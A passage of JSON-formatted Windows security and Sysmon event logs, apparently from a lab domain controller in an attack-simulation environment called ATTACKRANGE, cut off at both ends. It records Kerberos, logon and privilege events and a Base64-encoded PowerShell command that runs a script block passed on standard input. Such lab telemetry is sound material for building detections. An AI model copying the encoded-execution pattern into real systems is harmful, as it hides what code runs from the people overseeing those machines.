Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220738,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{FDBE110F-96FB-D6BF-2BA3-5B568FCEA81B}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{FDBE110F-96FB-D6BF-2BA3-5B568FCEA81B}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220739,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{FDBE110F-96FB-D6BF-2BA3-5B568FCEA81B}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{FDBE110F-96FB-D6BF-2BA3-5B568FCEA81B}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220740,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x11CA85\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{FDBE110F-96FB-D6BF-2BA3-5B568FCEA81B}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x11ca85","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{FDBE110F-96FB-D6BF-2BA3-5B568FCEA81B}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220741,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x11CA85\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x11ca85","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8540,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.070\r\nProcessGuid: {41C8662E-22D2-5F25-0000-001099CA1100}\r\nProcessId: 4436\r\nImage: C:\\Windows\\System32\\chcp.com\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Change CodePage Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CHCP.COM\r\nCommandLine: \"C:\\Windows\\system32\\chcp.com\" 65001\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-22D1-5F25-0000-00205EAC1100}\r\nLogonId: 0x11AC5E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD\r\nParentProcessGuid: {41C8662E-22D1-5F25-0000-0010A6BE1100}\r\nParentProcessId: 3408\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.070","ProcessGuid":"{41C8662E-22D2-5F25-0000-001099CA1100}","Image":"C:\\Windows\\System32\\chcp.com","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Change CodePage Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"CHCP.COM","CommandLine":"\"C:\\Windows\\system32\\chcp.com\" 65001","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-22D1-5F25-0000-00205EAC1100}","LogonId":"0x11ac5e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD","ParentProcessGuid":"{41C8662E-22D1-5F25-0000-0010A6BE1100}","ParentProcessId":"3408","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8541,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.068\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.068","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8542,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.068\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:46.068","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8543,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:46.068\r\nSourceProcessGUID: {41C8662E-22D1-5F25-0000-0010A6BE1100}\r\nSourceProcessId: 3408\r\nSourceThreadId: 2952\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-22D2-5F25-0000-001099CA1100}\r\nTargetProcessId: 4436\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+12389e8b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1182af65|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1182ac36|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+122dc04b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+117eb7cc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+11849c9b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1182d300|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1182d300|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1182d191|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1181f116|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1182b649|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1182b23c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1182af65|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1182ac36|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c2